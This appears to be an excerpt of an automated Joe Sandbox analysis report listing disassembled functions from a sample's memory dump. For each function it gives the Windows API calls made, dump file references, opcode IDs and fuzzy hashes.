                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                    • String ID:
                                                    • API String ID: 2864067406-0
                                                    • Opcode ID: 985e969aced4556fe75a7973b4ff5d3c9915389d3fa59156fd84dda5895e0d31
                                                    • Instruction ID: 9aa79783933daa5869f5a9c35b0c62a7444d75abd20426d463979777d98633c1
                                                    • Opcode Fuzzy Hash: 985e969aced4556fe75a7973b4ff5d3c9915389d3fa59156fd84dda5895e0d31
                                                    • Instruction Fuzzy Hash: 5131817950001CAFCB268F95CC59EBA7BB9FB89310F044099FA15A7361C7359D51EFA0
                                                    APIs
                                                    • __setmode.LIBCMT ref: 00790BE2
                                                      • Part of subcall function 0078402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,007D7E51,?,?,00000000), ref: 00784041
                                                      • Part of subcall function 0078402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,007D7E51,?,?,00000000,?,?), ref: 00784065
                                                    • _fprintf.LIBCMT ref: 00790C19
                                                    • OutputDebugStringW.KERNEL32(?), ref: 007C694C
                                                      • Part of subcall function 00794CCA: _flsall.LIBCMT ref: 00794CE3
                                                    • __setmode.LIBCMT ref: 00790C4E
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                    • String ID:
                                                    • API String ID: 521402451-0
                                                    • Opcode ID: c589b273b9c3052813750701471f362e86da66377c0d809c8f264e3e77885202
                                                    • Instruction ID: 6b6ab4fe93bf39f4572bf35453d3cd6aaa0a448404c919d2847dd6290d662ef4
                                                    • Opcode Fuzzy Hash: c589b273b9c3052813750701471f362e86da66377c0d809c8f264e3e77885202
                                                    • Instruction Fuzzy Hash: 75110272A04208EEDF18B7A4BC4AEBE7B69EF42320F14015AF204962C2DF6D584247A1
                                                    APIs
                                                      • Part of subcall function 007C8D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 007C8D3F
                                                      • Part of subcall function 007C8D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 007C8D49
                                                      • Part of subcall function 007C8D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007C8D58
                                                      • Part of subcall function 007C8D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 007C8D5F
                                                      • Part of subcall function 007C8D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007C8D75
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 007C92C1
                                                    • _memcmp.LIBCMT ref: 007C92E4
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007C931A
                                                    • HeapFree.KERNEL32(00000000), ref: 007C9321
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                    • String ID:
                                                    • API String ID: 1592001646-0
                                                    • Opcode ID: 4c4b19761cbaab3177ca7446debc76913dbbadb34b81dbedb4fe555e9f532254
                                                    • Instruction ID: 274cde1c7bed595763e193792cdfd2fea6aed3a95a6a5a5813555f0cb74f50cf
                                                    • Opcode Fuzzy Hash: 4c4b19761cbaab3177ca7446debc76913dbbadb34b81dbedb4fe555e9f532254
                                                    • Instruction Fuzzy Hash: 43216632E40109EBDB50DFA4C949FEEB7B8FF44301F04405DE985AB291E778AA05CBA0
                                                    APIs
                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007E1E6F
                                                      • Part of subcall function 007E1EF9: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007E1F18
                                                      • Part of subcall function 007E1EF9: InternetCloseHandle.WININET(00000000), ref: 007E1FB5
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Internet$CloseConnectHandleOpen
                                                    • String ID:
                                                    • API String ID: 1463438336-0
                                                    • Opcode ID: 47c5784999cd9cd91d663ff43f8db06f349e7a90f94ac4a7c0cf056bf7c2f444
                                                    • Instruction ID: e5cd3c07083982143085f5114609215be1682bb83acdbfe0639fb665ef99a3e3
                                                    • Opcode Fuzzy Hash: 47c5784999cd9cd91d663ff43f8db06f349e7a90f94ac4a7c0cf056bf7c2f444
                                                    • Instruction Fuzzy Hash: 6621D131201645BFEB119F62CC02FBBB7AEFF8C702F44401AFE0196650DB79A8219B90
                                                    APIs
                                                    • GetWindowLongW.USER32(?,000000EC), ref: 007F63BD
                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 007F63D7
                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 007F63E5
                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 007F63F3
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Window$Long$AttributesLayered
                                                    • String ID:
                                                    • API String ID: 2169480361-0
                                                    • Opcode ID: 3bbb09ef52e176b61f88d49fa563ac92da64460b951ca663546e2bf0cb2d35a4
                                                    • Instruction ID: fdba685d7920014f604a46390698655bde2b80c26739a912a229f79260ae837e
                                                    • Opcode Fuzzy Hash: 3bbb09ef52e176b61f88d49fa563ac92da64460b951ca663546e2bf0cb2d35a4
                                                    • Instruction Fuzzy Hash: 30119631305518AFDB14AB24DC49FBA77A9EF45320F148119F616D73D2CBA8AD01CB95
                                                    APIs
                                                      • Part of subcall function 007CF858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,007CE46F,?,?,?,007CF262,00000000,000000EF,00000119,?,?), ref: 007CF867
                                                      • Part of subcall function 007CF858: lstrcpyW.KERNEL32(00000000,?), ref: 007CF88D
                                                      • Part of subcall function 007CF858: lstrcmpiW.KERNEL32(00000000,?,007CE46F,?,?,?,007CF262,00000000,000000EF,00000119,?,?), ref: 007CF8BE
                                                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,007CF262,00000000,000000EF,00000119,?,?,00000000), ref: 007CE488
                                                    • lstrcpyW.KERNEL32(00000000,?), ref: 007CE4AE
                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,007CF262,00000000,000000EF,00000119,?,?,00000000), ref: 007CE4E2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: lstrcmpilstrcpylstrlen
                                                    • String ID: cdecl
                                                    • API String ID: 4031866154-3896280584
                                                    • Opcode ID: b5f6e11266776f7617934ed87ba9974e7b71684ed45bc427114ca4060ebd7b28
                                                    • Instruction ID: e009f547a9cb4ac4d721647b8d310bc913ed4856b30d48297ff52b0aa3cf9c81
                                                    • Opcode Fuzzy Hash: b5f6e11266776f7617934ed87ba9974e7b71684ed45bc427114ca4060ebd7b28
                                                    • Instruction Fuzzy Hash: 7511603A200345EFDB25AF24EC49E7A77A9FF45350B80402EF806CB2A0FB759951CB91
                                                    APIs
                                                    • _free.LIBCMT ref: 007A5331
                                                      • Part of subcall function 0079593C: __FF_MSGBANNER.LIBCMT ref: 00795953
                                                      • Part of subcall function 0079593C: __NMSG_WRITE.LIBCMT ref: 0079595A
                                                      • Part of subcall function 0079593C: RtlAllocateHeap.NTDLL(011F0000,00000000,00000001,?,00000004,?,?,00791003,?), ref: 0079597F
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeap_free
                                                    • String ID:
                                                    • API String ID: 614378929-0
                                                    • Opcode ID: d25a5581d1df0c0bb80e0d9597316f7020961add16f9b4eb143daf31cad5aa56
                                                    • Instruction ID: 66028b49f21bdc308f5a2d112033072a93df63beed57a2ca693edf2eaa8fae12
                                                    • Opcode Fuzzy Hash: d25a5581d1df0c0bb80e0d9597316f7020961add16f9b4eb143daf31cad5aa56
                                                    • Instruction Fuzzy Hash: 2F112732505E15EFCF253F70BC0975E3794AFD63A5F110B29F8189A190CEBC89408780
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 007D4385
                                                    • _memset.LIBCMT ref: 007D43A6
                                                    • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 007D43F8
                                                    • CloseHandle.KERNEL32(00000000), ref: 007D4401
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: CloseControlCreateDeviceFileHandle_memset
                                                    • String ID:
                                                    • API String ID: 1157408455-0
                                                    • Opcode ID: 845ac93f1e58c02398532c22143ee836e3b90d9979c13038435103b4f8cc0865
                                                    • Instruction ID: 78a9ad867a479d79b7651d7b76062bae33b236ed956efcf1b481e80555137e95
                                                    • Opcode Fuzzy Hash: 845ac93f1e58c02398532c22143ee836e3b90d9979c13038435103b4f8cc0865
                                                    • Instruction Fuzzy Hash: 09118A75901228BBD7309BA5AC4DFEBBB7CEF45760F10459AF908E7290D6744E808BA4
                                                    APIs
                                                      • Part of subcall function 0078402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,007D7E51,?,?,00000000), ref: 00784041
                                                      • Part of subcall function 0078402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,007D7E51,?,?,00000000,?,?), ref: 00784065
                                                    • gethostbyname.WSOCK32(?,?,?), ref: 007E6A84
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 007E6A8F
                                                    • _memmove.LIBCMT ref: 007E6ABC
                                                    • inet_ntoa.WSOCK32(?), ref: 007E6AC7
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                    • String ID:
                                                    • API String ID: 1504782959-0
                                                    • Opcode ID: 63a4637ce5599e960369ef7ade03f1a8fe9b954c1eccab23ec7112256d886d1d
                                                    • Instruction ID: b8a6821a75b888c67683dafd5ea247bbc55e0dc7ef4b619fe0e25fdd9b985fb1
                                                    • Opcode Fuzzy Hash: 63a4637ce5599e960369ef7ade03f1a8fe9b954c1eccab23ec7112256d886d1d
                                                    • Instruction Fuzzy Hash: FA114F71900109EFCB44FBA4DD4ADAEB7B8FF18311B148065F506A72A2DF359E14DBA1
                                                    APIs
                                                      • Part of subcall function 007729E2: GetWindowLongW.USER32(?,000000EB), ref: 007729F3
                                                    • DefDlgProcW.USER32(?,00000020,?), ref: 007716B4
                                                    • GetClientRect.USER32(?,?), ref: 007AB93C
                                                    • GetCursorPos.USER32(?), ref: 007AB946
                                                    • ScreenToClient.USER32(?,?), ref: 007AB951
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                    • String ID:
                                                    • API String ID: 4127811313-0
                                                    • Opcode ID: 90d3799d678e3475d3ed9ffb56a9ed1999f9703d1655dcc08bfebad201ca9dc0
                                                    • Instruction ID: c4369f5d0765001c434cdf425d879a5338e63f09b2c927c253f8518ed20ba38e
                                                    • Opcode Fuzzy Hash: 90d3799d678e3475d3ed9ffb56a9ed1999f9703d1655dcc08bfebad201ca9dc0
                                                    • Instruction Fuzzy Hash: 4F114375A00119EBCF10EF98C8899BE77B9FB45300F944499EA15E7141CB38BA51CFA1
                                                    APIs
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 007C9719
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007C972B
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007C9741
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007C975C
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID:
                                                    • API String ID: 3850602802-0
                                                    • Opcode ID: 22fb4cabcbb5f56c7165b909ebc0bdc712953979a0de1e781ef0986d5506c257
                                                    • Instruction ID: 243b742e4ce3c581b3cdbbea371c8b0d9b973090743d7f4a7bb28fa9a1be9226
                                                    • Opcode Fuzzy Hash: 22fb4cabcbb5f56c7165b909ebc0bdc712953979a0de1e781ef0986d5506c257
                                                    • Instruction Fuzzy Hash: 11115A39901218FFEB11DF95CD84F9DBBB8FB48710F204099EA00B7290D671AE10DB90
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0077214F
                                                    • GetStockObject.GDI32(00000011), ref: 00772163
                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 0077216D
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: CreateMessageObjectSendStockWindow
                                                    • String ID:
                                                    • API String ID: 3970641297-0
                                                    • Opcode ID: 25fc8f3e301fb77e98e8cfc02b08790b66ca760de760a536a462bb7393badd18
                                                    • Instruction ID: 37a2a20bb87e05dc9f06de63df1656a23cb671be1d0da349fd25e46669544f83
                                                    • Opcode Fuzzy Hash: 25fc8f3e301fb77e98e8cfc02b08790b66ca760de760a536a462bb7393badd18
                                                    • Instruction Fuzzy Hash: 8F118B7210120DBFDF125F909C44EEA7BA9FF583A4F444211FA2852111C73ADC61EFA0
                                                    APIs
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,007D04EC,?,007D153F,?,00008000), ref: 007D195E
                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,007D04EC,?,007D153F,?,00008000), ref: 007D1983
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,007D04EC,?,007D153F,?,00008000), ref: 007D198D
                                                    • Sleep.KERNEL32(?,?,?,?,?,?,?,007D04EC,?,007D153F,?,00008000), ref: 007D19C0
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: CounterPerformanceQuerySleep
                                                    • String ID:
                                                    • API String ID: 2875609808-0
                                                    • Opcode ID: 908e42b33cc98ba3da059d2cf200e3efe96ec51bcb59b739299c0d0ba918ee37
                                                    • Instruction ID: a91abccd71289c919daaa5b77651d248edbb0f697840db07ecded2916e6075ce
                                                    • Opcode Fuzzy Hash: 908e42b33cc98ba3da059d2cf200e3efe96ec51bcb59b739299c0d0ba918ee37
                                                    • Instruction Fuzzy Hash: 40112731D0466DEBCF00DFA5D9A8BEEBB78FF08751F804156E981B2245CB34A660CB91
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 007FE1EA
                                                    • LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 007FE201
                                                    • RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 007FE216
                                                    • RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 007FE234
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Type$Register$FileLoadModuleNameUser
                                                    • String ID:
                                                    • API String ID: 1352324309-0
                                                    • Opcode ID: 8be41de56365788a9f546a1db0fc7a3f86d14778531a710c42a4aa3bc1ccda0a
                                                    • Instruction ID: 7db48f0cc99427c1f16740a789845367c387c20e9b4e065cffdeccd60159e631
                                                    • Opcode Fuzzy Hash: 8be41de56365788a9f546a1db0fc7a3f86d14778531a710c42a4aa3bc1ccda0a
                                                    • Instruction Fuzzy Hash: A91161B5206B08DBE3308F51DD08FA3BBBCFB00B14F108559A756D6261E7B4E504AFA5
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                    • String ID:
                                                    • API String ID: 3016257755-0
                                                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                    • Instruction ID: 8f2730bade12d0417e78c134448a3c31b8d4a228334757a1f92bf317b035e365
                                                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                    • Instruction Fuzzy Hash: CB017B3604814ABBCF1A5E84CC059EE3F36BB9A340B488615FA1858171C33AC9B1EB81
                                                    APIs
                                                    • GetWindowRect.USER32(?,?), ref: 007FB956
                                                    • ScreenToClient.USER32(?,?), ref: 007FB96E
                                                    • ScreenToClient.USER32(?,?), ref: 007FB992
                                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 007FB9AD
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                    • String ID:
                                                    • API String ID: 357397906-0
                                                    • Opcode ID: 09fd65ffd7734ab9f59bf8e1f24d5cc0e73d635d411761a16a5601aeafa79d32
                                                    • Instruction ID: b9be99f129e262bf0252e45d37ac50ec5238b845274790f85fedeee7f2b44681
                                                    • Opcode Fuzzy Hash: 09fd65ffd7734ab9f59bf8e1f24d5cc0e73d635d411761a16a5601aeafa79d32
                                                    • Instruction Fuzzy Hash: 461143B9D00209EFDB41CF98C984AEEBBF9FB58310F108156E924E3610D775AA658F50
                                                    APIs
                                                    • _memset.LIBCMT ref: 007FBCB6
                                                    • _memset.LIBCMT ref: 007FBCC5
                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00838F20,00838F64), ref: 007FBCF4
                                                    • CloseHandle.KERNEL32 ref: 007FBD06
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
